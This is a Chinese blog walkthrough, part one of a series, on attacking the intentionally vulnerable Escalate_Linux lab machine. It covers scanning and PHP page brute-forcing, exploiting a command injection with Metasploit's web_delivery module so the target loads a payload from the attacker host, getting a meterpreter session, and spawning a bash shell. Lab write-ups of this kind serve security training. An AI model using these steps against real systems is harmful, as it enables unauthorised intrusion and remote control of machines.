Escalate_Linux靶机详解(1)

已于 2024-02-25 09:47:39 修改
阅读量511 收藏 7
点赞数 12
分类专栏: Escalate_Linux靶机教程 文章标签: linux 运维 服务器
于 2024-02-21 09:26:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75023818/article/details/136203147
版权

Escalate_Linux靶机详解(1)

一,信息收集

首先扫描存活主机

目标地址:192.168.236.131

使用nmap扫描保存为linux.nmap

2,HTTP探测

发现开放了80端口http 

打开站点是apache的默认站点

默认页面,尝试对web Directory Search 使用dirb对Web站点进行PHP页面暴破 因为一般web平台默认支持PHP dirb http:/192.168.236.131 -X .php(指定后缀名)

访问扫描到的文件

存在命令注入

发现可以执行系统命令

查看内核版本 uname -r

查看系统发行版lsb_release -a

查看是否有nc工具:which nc

kali需要一个服务端,nc监听1234

发现nc无法使用

目标系统存在命令注入漏洞

背景:目标系统存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,. 但不想在目标设备硬盘上留下任何webshell文件信息 (2)利用nc或python的方法反弹shell不好使用 解决思路:让目标设备从远端服务器加载webshell代码至内存执行

正确方法与工具:使用msf中exploit的web_delivery模块。此模块支持在本地监听一个端 口,别人一旦访问该端口就会将该端口内的文件读取至本地执行(把webshell放在该端口 下刚刚好)。

打开Msf

使用 MSE中web_delivery模块(实现webshell远程投递) use exploit/multi/script/web delivery set SRVH0ST 192.168.236.128(攻击端的地址) set LH0ST 192.168.236.128(攻击端的地址) exploit

代码填入发现无法执行,存在知识点url编码

通常如果一样东西需要编码,说明这样东西并不适合传输。对于URL来说,编码主要是为了避免引发歧义与混乱。例如,URL参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/?name=xiao&pwd=123456如果你的value字符串中包含了=或者&,那么势必会造成接收U川的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。

使用BP进行url编码

然后传递

传递成功

使用sessions -i查看

获得meterpreter

进入shell

使用$ python2 -c 'import pty;pty.spawn("/bin/bash")'

获得用户权限。

提权后面文章在发布。

Escalate_Linux(2)-利用SUID提权-CSDN博客

Escalate_Linux(3)--通过读取密码文件shadow来破解root用户的口令实现提权-CSDN博客

Escalate_Linux(4)-利用SUDO实现提权-CSDN博客

诸君山顶见!

苏生要努力
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ESCALATE:ESCALATE(实验规范,捕获和实验室自动化技术)一种本体论框架和开源软件包,为人类和机器可读的实验规范,全面和可扩展的(元)数据捕获以及结构化数据报告提供了抽象层
04-02
逃生v3 自述文件 ESCALATE(实验规范,捕获和实验室自动化技术)—本体论框架和开源软件包为人类和机器可读的实验规范,全面和可扩展的(元)数据捕获以及结构化数据报告提供了一个抽象层。 作者 另请参阅参与此项目的列表。 执照 此项目已获得MIT许可证的许可-有关详细信息,请参阅文件 致谢
Kali Linux Intrusion and Exploitation Cookbook
04-26
Discover multiple solutions to escalate privileges on a compromised machine Identify security anomalies in order to make your infrastructure secure and further strengthen it Acquire the skills to ...
Escalate_Linux靶机提权渗透测试
末班车的博客
03-10 648
使用Escalate_Linux靶机,学习多种提权方法
记录一次VulnHub 靶场——Escalate_Linux的渗透测试过程
旺仔Sec&blog
03-07 837
SUID 权限通常用于需要以特定用户权限执行的程序,比如一些系统命令或管理工具。例如,passwd 命令通常具有 SUID 权限,因为它需要修改系统密码文件,这是普通用户无法直接操作的。通过 SUID 权限,普通用户可以执行 passwd 命令来修改自己的密码,而无需获取 root 权限。然而,SUID 权限也带来了安全风险,因为恶意用户可能会利用具有 SUID 权限的程序来进行特权提升或执行其他恶意操作。因此,系统管理员需要谨慎地管理具有 SUID 权限的程序,并确保它们没有潜在的安全漏洞。
靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
serendipity1130的博客
08-31 3981
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.提示:
escalate靶机为例学习linux的提权方式-linux提权学习笔记(1)
zr1213159840的博客
06-25 2891
linux11种提权方式总结
No.40-VulnHub-Escalate_Linux: 1-Walkthrough渗透学习
qq_34801745的博客
02-02 1623
** VulnHub-Escalate_Linux: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/escalate_linux-1,323/ 靶机难度:中级(CTF) 靶机发布日期:2019年6月30日 靶机描述: Escalate_Linux-一种有意开发的易受攻击的Linux虚拟机。该计算机的主要重点是学习Linux Post Exp...
escalate:纯OCaml中Deflate算法的实现
06-02
升级 纯 OCaml 数据压缩。 基本原理 zlib是互联网事实上的关键库,因为 DEFLATE 压缩及其容器格式 ZLIB 和 GZIP 无处不在。 该库试图为zlib提供类型安全、内存安全的替代方案。 格式支持 目前正在解析压缩的文件。...
srcqe_analysis:EIC的短程相关准弹性分析
03-21
独立插件示例在ifarm上运行source /group/eic/escalate/env.sh要运行python示例,请编辑run_g4e.py(文件名等)并运行# G4Epython3 run_g4e.py# Analysispython3 run_plugin.py要从命令行运行插件: ejana-Pplugins=...
微软内部资料-SQL性能优化3
11-27
Overview 1 Lesson 1: Concepts – Locks and Lock Manager 3 Lesson 2: Concepts – Batch and Transaction 31 Lesson 3: Concepts – Locks and Applications 51 Lesson 4: Information Collection and Analysis ...
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7506
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 308
命令,您需要在具有适当权限的环境中运行它,例如通过SSH登录到Linux服务器或在Linux终端中运行。请确保指定的路径存在且可写。文件中未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之前,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
Linux Centos 环境下搭建RocketMq集群(双主双从)
最新发布
gonghua0502的专栏
06-15 326
worker2中配置两个文件:broker-a.properties、broker-b-s.properties。worker3中配置两个文件:broker-b.properties、broker-a-s.properties。启动顺序为:先启动3台服务器的nameserver,再启动worker2和worker3中的broker.worker1 只需要启动nameserver即可。
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 323
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
Linux基础命令
威桑的博客
06-11 944
常见基础Linux命令
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 756
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
Linux】生产者消费者模型——阻塞队列BlockQueue
AAlykk的博客
06-11 952
Linux有两个重要的模型,一个是生产者消费者模型——阻塞队列BlockQueue,另一个则是生产者消费者模型——环形队列RingQueue。今天我们学习其中一个模型:【Linux】生产者消费者模型——阻塞队列BlockQueue。⭐主体生产者消费模型高效在哪里?高效体现在一个线程拿出来任务可能正在做计算,它在做计算的同时,其他线程可以继续从队列中拿,继续做运算,高效并不是体现在从队列中拿数据高效!而是我们可以让一个、多个线程并发的同时计算多个任务!
Linux Shell命令vim使用
weixin_73074505的博客
06-12 336
其中第一个直接在Linux终端在线进行,第二个则是vim编辑器中的(所谓vim编辑器可以看成将代码写进一个文件进行编辑运行)第三个vim是对文件的操作,这也是Linux最大的作用。以判断引出(学过C++其他语言容易接受)。测试当前用户对某文件是否具有“可执行”权限。测试当前用户对某文件是否具有“可读”权限。测试当前用户对某文件是否具有“可写”权限。等待时间,到时间则停止输入。参数个数 如限制密码长度。测试文件是否为普通文件。屏蔽回显,用于输入密码。输入终结符 例如输入。
linux CVE-2016-2183)
08-25
CVE-2016-2183 is a vulnerability that was found in the Linux kernel. This vulnerability allows local users to gain root privileges by leveraging a race condition in the keyring implementation. By exploiting this vulnerability, an attacker can escalate their privileges and gain unauthorized access to the system. It is recommended to apply the relevant patches or updates provided by the Linux distribution to mitigate this vulnerability.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值